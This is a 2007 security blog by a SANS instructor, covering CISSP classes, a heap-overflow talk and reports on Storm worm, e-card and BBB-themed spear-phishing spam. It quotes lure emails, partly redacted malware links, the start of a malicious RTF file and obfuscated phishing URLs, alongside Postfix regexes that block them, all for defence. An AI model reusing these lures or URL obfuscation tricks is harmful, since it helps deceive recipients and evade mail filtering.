Saturday, December 22, 2007

Heap 'Off By 1' Overflow Illustrated

I delivered a presentation at SANS CDI 2007 last Sunday, titled Heap 'Off By 1' Overflow Illustrated. It was based on my GCIH Gold paper A Heap o’ Trouble, Heap-based flag insertion buffer overflow in CVS.

The attack is a few years old now, but the 'off by one' technique is interesting: the attacker has a single unaccounted 'M' at his/her disposal, and that is enough to seize control of program execution. The shellcode is dropped in one character at a time, by subverting the heap's unlink process. I was able to follow the attack, byte-by-byte, thanks to liberal use of libvoodo, and some perl scripts.

The attack's author, vl4d1m1r of Ac1dB1tch3z, wrote his own analysis earlier this year in Phrack 64.

Fellow Sans Technical Institute student Manuel Humberto Santander Pelaez also delivered a presentation at CDI 2007 on Antiforensics.


Tuesday, November 20, 2007

Detecting Spam with Genetic Regular Expressions

My GIAC Certified Intrusion Analyst (GCIA) Gold paper was accepted today: Detecting Spam with Genetic Regular Expressions.

The concept behind the paper is to see if regexes may be 'evolved' via genetic algorithms to detect and block spam.

Short answer: it works. For more details (including POC code), check out the paper.

Many thanks to my GCIA Gold adviser Johannes Ullrich!

I'd love to hear any feedback on the paper.

Thursday, October 25, 2007

Community SANS Boston 2007 day 4

I'm blogging live from Community SANS Boston 2007.

Today we finished up the Crypto domain, and completed Operations Security. Loads of great comments from class. We discussed fairness (and legality) in regards to internet history searches. Many of us had been in the position where a manger will say "John Doe is wasting time on the internet: show me a history of his internet usage."

I believe that you don't use technology to solve a personnel problem. If an employee is 'wasting time' on the internet, they could be wasting time in other ways, such as on the phone, long breaks, playing games, etc. It's not a technology problem; it's a management problem.

If you were to discipline 'John' for non-business internet usage, you should ask yourself: how many other employees use the internet just as much (or more) for non business purposes? Are you holding them to the same level of scrutiny as you are holding John? If not, you may have legal issues.

Nick brought in a few books today, including the aformentioned The Code Book by Simon Singh. Also the classics The Cuckoo's Egg by Clifford Stoll, and The Art of Deception by Kevin Mitnick.

The Code Book opens with the Story of Mary Queen of Scots: she was executed for attempting to overthrow the British throne, and implement Catholic rule in Britain. Often left out of the history books is the fact that cryptanalysis lead to her death: Queen Elizabeth was hesitant to execute her cousin, until the proof of treason was revealed when Mary's encrypted letters were decrypted.

Wednesday, October 24, 2007

Community SANS Boston 2007 day 3

I'm blogging live from Community SANS Boston 2007. Right now the Red Sox are on, and winning game 1 of the World Series 6-1.

We started on the Crypto domain today; my favorite domain. The history of crypto is fascinating: the course of history has changed due to crypto. I recommended The Codebreakers by David Kahn to my students; it is a fantastic history of crypto, up through the late 1960s. The story of the Japanese Purple Machine is fascinating. Cracking the purple machine saved untold thousands of lives, shaved years off World War II in the Pacific theater, lead to a decisive victory in the Battle of Midway Island, and changed the course of the war.

Miguel, one of my students, recommended The Code Book by Simon Singh, and Cryptonomicon by Neal Stephenson. I have added them to my Amazon list.

Monday, October 22, 2007

Community SANS Boston 2007 day 1

Community SANS Boston 2007 began today; I thought day 1 went very well.

Mike, a gentleman who attended my Incident Handling/Hacker Techniques class last year, decided to pursue the CISSP® certification and attended this class. After earning his GCIH last year, he was promoted and now heads up a security team at his company. He decided it was time to round out his information security management knowledge. It's always great to see repeat students!

We have a great cross-section of industries represented in class, including some military and financial folks.

We covered the Access Control Systems & Methodology today. A universal point that came up today: access control is hard, and often thankless. We often see a litany of access requests, with many folks clearly requesting more access than is required. Users can be quite vocal when access is denied or limited, and we never hear "Great job on access control today! You really nailed it!!"

A few questions from today:

Q: Are the questions on the CISSP® in domain order, or randomized?
A: The questions are in random order.

Q: What are the new CISSP® experience requirements as of Oct 1st, 2007?
A: (ISC)2 now requires 5 years of experience in two or more domains in the Common Body of Knowledge (and you may subtract 1 year with a 4-year degree). This is a change from the old rules, which required 4 years of experience in one of the domains in the Common Body of Knowledge. See the new CISSP® experience requirements.

As an FYI, the next CISSP® @Home starts in January.

Monday, September 17, 2007

Community SANS Boston 2007

Community SANS Boston 2007 begins October 22nd. I'll be teaching MGT 414, SANS® +S™ Training Program for the CISSP® Certification Exam.

Looks like the next SANS CISSP® @Home will begin in late November. I'll post the schedule once it's official.

Thursday, September 06, 2007

Storm worm now warns of RIAA investigation

The latest change in the ongoing Storm Worm assault is email warning of RIAA investigations. Here are some Subject lines from this AM:
  • Subject: Big brother is watching you.
  • Subject: Careful, being watched.
  • Subject: Do you know who is watching you?
  • Subject: The things you do online are being watched.
  • Subject: What you do online is no longer private.
  • Subject: You are being watched online.
  • Subject: Your Privacy is being violated
  • Subject: Your online activities are no longer safe.
  • Subject: Your online life is not private
  • Subject: Your privacy is no longer safe
There are various bodies; here's an example:
If you download music of other files, you're being tracked. The RIAA is after everyone they can find. Our program will eliminate any trace to you. Keep your right to privacy safe, and download our software for free.
The emails point to an IP address, suggesting you "Download Tor". The resulting webpage points to 'tor.exe', which Avira identifies as Worm/Stom.tck"

Sunday, July 08, 2007

'Ecard' spams are now showing 'abnormal activity'

The 'Ecard' spams have now switched over to 'abnormal activity' spams. Here's a summary of the subject lines:
  • Subject: ATTN!
  • Subject: Alert!
  • Subject: Malware Alert
  • Subject: Spyware Alert!
  • Subject: Spyware Detected!
  • Subject: Trojan Alert!
  • Subject: Trojan Detected!
  • Subject: Virus Activity Detected!
  • Subject: Warning!
  • Subject: Worm Activity Detected!
  • Subject: Worm Alert!
  • Subject: Worm Detected!
Here's an example body:
Dear Customer,

Our robot has detected an abnormal activity from your IP adress
on sending e-mails. Probably it is connected with the last epidemic
of a worm which does not have official patches at the moment.

We recommend you to install http://XX.71.238.156/?7c634591933434671c16a2e59b1283bd17061a8 to remove worm files and stop email sending, otherwise your account will be blocked.

Customer Support

The exe on the linked site is now called 'patch.exe,' which is identified as 'Trojan horse TR/Small.DBY.DB' by Avira.

Tuesday, July 03, 2007

4th of July ecard malware

The 'ecard' spam wave has been updated with 4th of July-themed subjects:
  • Subject: 4th Of July Celebration
  • Subject: America the Beautiful
  • Subject: America's 231st Birthday
  • Subject: American Pride, On The 4th
  • Subject: Americas B-Day
  • Subject: Celebrate Your Nation
  • Subject: Celebrate Your Independence
  • Subject: Fireworks on The 4th
  • Subject: Fourth of July Party
  • Subject: God Bless America
  • Subject: Happy 4th of July
  • Subject: Happy B-Day USA
  • Subject: Happy Birthday America
  • Subject: Happy Fourth of July
  • Subject: Independence Day At The Park
  • Subject: Independence Day Celebration
  • Subject: Independence Day Party
  • Subject: July 4th B-B-Q Party
  • Subject: July 4th Family Day
  • Subject: July 4th Fireworks Show
  • Subject: Your Nations Birthday
The Internet Storm Center has a writeup.

The malware is the same as the last wave. The index.html file contains an obfuscated hex-encoded payload. The current ecard.exe (the executable is updated frequently, in order to evade virus scanners) currently scans as 'TR/Small.DBY.DB' by Avira.

Here's a sample email body:
Hi. Family member has sent you a greeting ecard.
See your card as often as you wish during the next 15 days.


If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:


Or copy and paste it into your browser's "Location" box (where Internet addresses go).

PRIVACY honors your privacy. Our home page and Card Pick Up have links to our Privacy Policy.

By accessing your card you agree we have no liability.
If you don't know the person sending the card or don't wish to see the card, please disregard this Announcement.

We hope you enjoy your awesome card.

Wishing you the best,

Saturday, June 30, 2007

More greeting card spam

The greeting card spam wave continues. Subject lines vary somewhat; here's a sampling from today:
  • You've received a greeting card from a class-mate!
  • You've received a greeting card from a colleague!
  • You've received a greeting card from a family member!
  • You've received a greeting card from a friend!
  • You've received a greeting card from a neighbor!
  • You've received a greeting card from a school mate!
  • You've received a greeting ecard from a class-mate!
  • You've received a greeting ecard from a colleague!
  • You've received a greeting ecard from a family member!
  • You've received a greeting ecard from a friend!
  • You've received a greeting ecard from a neighbour!
  • You've received a greeting ecard from a partner!
  • You've received a greeting ecard from a worshipper!
  • You've received a greeting postcard from a colleague!
  • You've received a greeting postcard from a family member!
  • You've received a greeting postcard from a friend!
  • You've received a postcard from a class-mate!
  • You've received a postcard from a colleague!
  • You've received a postcard from a family member!
  • You've received a postcard from a partner!
  • You've received an ecard from a partner!
  • You've received an ecard from a worshipper!
They are now linking to IP addresses (as opposed to .hk sites in the early stages).

The Internet Storm Center has an excellent analysis.

Here's a sample 'index.html' file:

The hex code goes on for awhile:

The file is obfuscated with XORed hexadecimal. The key in this case is '227' (it changes with each copy, for a simple form of polymorphism). This perl snippet will decode the XORed hex:

perl -e 'while(<>){

If you are analyzing your own code, change the '227' in the perl code to match the key in the index.html file.

The de-obfuscated code looks like this:

Among other nastiness, it retrieves the file http://XX.252.250.104/file.php, which is really a Windows executable that BitDefender identifies as: "Generic.Malware.dld!!.2526793B"

Tuesday, June 26, 2007

HK greeting card malware

Beginning this morning we received a torrent of 'greeting card' malware, linking to domains in Hong Kong.

The excellent Chinese Internet Security Response Team has a blog entry on this attack.

Sites today include 'menot', 'notme,' and 'catcher,' all in the .HK tld.

The attack appears highly widespread. Avira detects EXP/iFrame.D.1 in the drive-by javascript included in the site's 'index.html' file, and TR/Small.DBY.DH in ecard.exe (helpfully offered if the drive-by exploit fails, with the text "the We are currently testing a new browser feature. If you are not able to view this ecard, please click here to view in its original format.)

The spams look like this:

From: "*****.hk"
Subject: You've received a postcard from a family member!
Date: Tue, 26 Jun 2007 19:19:33 -0500

Good day.

Your family member has sent you an ecard from ******.hk.

Send free ecards from ******.hk with your choice of colors, words and music.

Your ecard will be available with us for the next 30 days. If you wish to keep the ecard longer, you may save it on your computer or take a print.

To view your ecard, choose from any of the following options:


Click on the following Internet address or
copy & paste it into your browser's address box.



Copy & paste the ecard number in the "View Your Card" box at

Your ecard number is

Best wishes,

*If you would like to send someone an ecard, you can do so at

Thursday, June 21, 2007

'' spearphishing attack

I've seen a number of fake '' emails, spammed to senior positions.

The Better Business Bureau's official site describes the attack.

I attached a cleaned-up copy below, with headers.

The emails contain an attachment, in these cases called 'Document_for_Case.doc'. It's an RTF (Rich Text Format) document that contains a malicious embedded object; here's the beginning of that file:

{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit;}\viewkind4\uc1\pard\f0\fs20 This document contains an embedded object. To open it double-click the icon.\par
{\object\objemb{\*\objclass Package}\objw2325\objh765{\*\objdata

That document scans 'clean' by most virus scanners. On 6/21/2007 reported that only 9 of their 30 scanners spot it.

This attack may be fairly damaging, given that weak antivirus coverage, the fact that it's a legitimate '.doc' file (typically allowed through internet mail relays, unlike exe's which are sometimes blocked), and due to the fact that it's targeted at a small number of senior users.

Here's the email, somewhat cleaned up. The original was in html format:

Received: from ( [])
by *****.*****.org (Postfix) with ESMTP id 0AAC85F13D4
for <*****@*****.org>; Thu, 21 Jun 2007 09:05:37 -0400 (EDT)
Received: from (unknown [])
by (Postfix) with ESMTP id 38E97AE182
for <*****@****.org>; Thu, 21 Jun 2007 16:05:03 +0300 (EEST)
Received: from localhost.localdomain ([])
by (Lotus Domino Release 5.0.9)
with SMTP id 2007062116045807:59067 ;
Thu, 21 Jun 2007 16:04:58 +0300
From: Better Business Bureaus
Subject: Complaint Case Number 450596111
MIME-Version: 1.0
Date: Thu, 21 Jun 2007 16:04:58 +0300
Content-Type: multipart/mixed; boundary=38ACD4BC0E5E9B20090A53C405940998
To: undisclosed-recipients:;

Dear Mr./Mrs. ***** *****

You have received a complaint in regards to your business services. The
complaint was filled by Mr. ***** ***** on 6/19/2007

Complaint Case Number: XXXXXXXXXX

Complaint Made by Consumer Mr. ***** *****

Complaint Registered Against: Company ********************

Date: 6/19/2007

Instructions on how to resolve this complaint as well as a copy of the original complaint are attached to this email.

Disputes involving consumer products and/or services may be arbitrated.
Unless they directly relate to the contract that is the basis of this dispute
the following claims will be considered for arbitration only if all parties
agree in writing that the arbitrator may consider them:

- Claims based on product liability;
- Claims for personal injuries;
- Claims that have been resolved by a previous court action, arbitration, or written agreement between the parties.

The decision as to whether your dispute or any part of it can be arbitrated rests solely with the BBB.

The BBB offers its members a binding arbitration service for disputes involving marketplace transactions.

Arbitration is a convenient, civilized way to settle disputes quickly and fairly, without the costs associated with other legal options.

© 2003 Council of Better Business Bureaus, Inc. All Rights Reserved.

Tuesday, June 05, 2007

Upcoming conferences and SANS Monterey

I will teach SANS Management 414: SANS® +S™ Training Program for the CISSP® Certification Exam in St. Louis, beginning this Monday:

Community SANS Portland Maine 2007 was just announced, beginning August 20th. It's Hacker Techniques (Security 504), in 'bootcamp' style. It's SAN's first conference in Maine.

I just got back from beautiful Monterey, CA, where I taught Security Hacker Techniques (SEC 504):

I've been to other parts of California; Monterey is my favorite so far.

Thursday, April 26, 2007

Mix and Match

An additional point worth mentioning regarding IP Address Obfuscation is that the techniques can be mixed and matched within the same IP address.
All/most of these formats should work in all browsers. Additionally, in dotted format, each octet can be of the different bases. For example, 207.0x8E.0203.235 is a valid (though unconventional) equivalent to the above addresses. (Wikipedia article on IPv4)
Spammers are actively using this technique; this URL arrived today in a Pump and Dump stock spam:


The link in the email refers to, but actually redirects to a random .BIZ site.

The format of this URL is:
  1. 'Dotted Hex with leading zeroes' .
  2. 'Dotted Octal with leading zeroes' .
  3. 'Dotted Hex with leading zeroes' .
  4. 'Dotted Decimal'.
The address translates to in dotted quad (decimal) format.

Tuesday, April 24, 2007

URL Obfuscation for fun and profit

We've all grown accustomed to the 'dotted quad' format of IP addresses. Localhost is, for example.

'' is simply a convenient shorthand for a 32-bit number, in this case listed as four 8-bit numbers. There are numerous other ways to represent that 32-bit number. The simplest is to represent it as a decimal. '' is decimal 2,130,706,433.

An easy way to make that conversion is to open up a calculator; Windows calculator in Scientific mode works fine (go to Options-> Scientific). Then choose binary mode ('Bin'), and enter '01111111' (127) . '00000000' (0). '00000000' (0).'00000001' (1). Then hit decimal ('Dec').

Your answer should be 2130706433. To verify you are correct, open a command prompt and type 'ping 2130706433'. What IP address answered?

There are other legitimate ways to represent an IP address; many are summarized in this Wikipedia article. Other forms include dotted hex, dotted octal, and others.

This topic is normally an arcane source of trivia for die-hard IP geeks. I mention it today because spammers and phishers abuse these forms of URL obfuscation in an attempt to bypass IP address blocking schemes.

Here are some live examples harvested from today's mail spool:

Bank phishing attempt using dotted hex IP address:
  • Subject: Arizona Federal - Account Suspended.
  • Embedded URL: http://0xcb.0xe9.0xc7.0x92/(deleted)/
Ebay phishing attempt using a decimal IP
  • Subject: Question about payment for item: #2070651641
  • Embedded URL: http://1478700420:82/(deleted)&co/reg.php
Paypal phishing attempt using a dotted octal URL:
  • Subject: Update your PayPal records
  • Embedded URL: http://0112.0000.0067.0012/(deleted)/index.htm
MSN phishing scam in dotted hex, with leading '0's:
  • Subject: Fwd: 721362
  • Embedded URL: href="http://0x000000000000000D8.0x0D3.0x000000000000000009E.0x00000(deleted)">
As the last example illustrates, these obfuscation techniques may be further confused by adding leading zeroes.

The good news is these phishing attempts are trivially easy to block via email, assuming your MTA can block email based on regular expression matches in the body of the email.
Postfix is one such mailer, with its excellent support of Perl-Compatible Regular Expressions.

Here are the pcre maps I use to block these URL obfuscation attacks:
  • /http:\/\/(0x0*[0-9A-F]{2}\.){3}0x0*[0-9A-F]{2}/ REJECT URL Obfuscation
  • /http:\/\/0*[0-9]{8,10}/ REJECT URL Obfuscation
  • /http:\/\/0x0*[0-9A-F]{8}/ REJECT URL Obfuscation
  • /http:\/\/(0+[0-7]{3}\.){3}0+[0-7]{3}/ REJECT URL Obfuscation
These will block dotted hexadecimal, decimal, hexadecimal, and dotted octal URLs, respectively. You may enable these using the Postfix MTA by saving them to a file (in this case, /usr/local/etc/postfix/bodyfilt.pcre), and entering the following line in

body_checks = pcre:/usr/local/etc/postfix/bodyfilt.pcre

Postfix PCRE's are case insensitive by default. If your MTA is not, use '[A-Za-z0-9]' for a hex digit (for example).

Tuesday, April 17, 2007


I just finished up teaching SANS@Home Management 414: SANS® +S™ Training Program for the CISSP® Certification Exam with Dr. Eric Cole, which began on Monday, February 26, 2007, and ran through Thursday, April 12, 2007.

The next SANS CISSP @Home begins on July 16th.

It will be 13 sessions, Mondays and Wednesday nights. The last class was a blast; I'm looking forward to this one.

Wednesday, March 21, 2007


I taught Stay Sharp: Using Regular Expressions in Boston on May 3rd:

Thursday, March 15, 2007

Community SANS Maine 2007

SANS just tentatively announced Community SANS Portland Maine 2007, beginning August 20th.

No details yet on hotel, etc. I plan to teach one track there.

Monday, March 05, 2007

Hacker Techniques at SANS Monterey

I will teach Security 504: Hacker Techniques, Exploits & Incident Handling at SANS Monterey in May.

Friday, February 09, 2007


Five of my papers on Cryptography have been posted as part of the 'GIAC Research in the Common Body of Knowledge.' They include papers on AES, DES, Kerberos, and others.

My papers on Artificial Intelligence and Intrusion Detection will be posted shortly.

Older stuff

I recently taught SANS Security 504 (Hacker Techniques, Exploits and Incident Handling), Security 452: Mastering Packet Analysis, and Security 450: Defeating Rogue Access Points at Community SANS Portsmouth:

I lead SANS Stay Sharp "Mastering Packet Analysis" course on July 20th 2006:

I led the Community SANS Boston 2006 CISSP conference

I am a contributing author to SANS HIPAA Security Implementation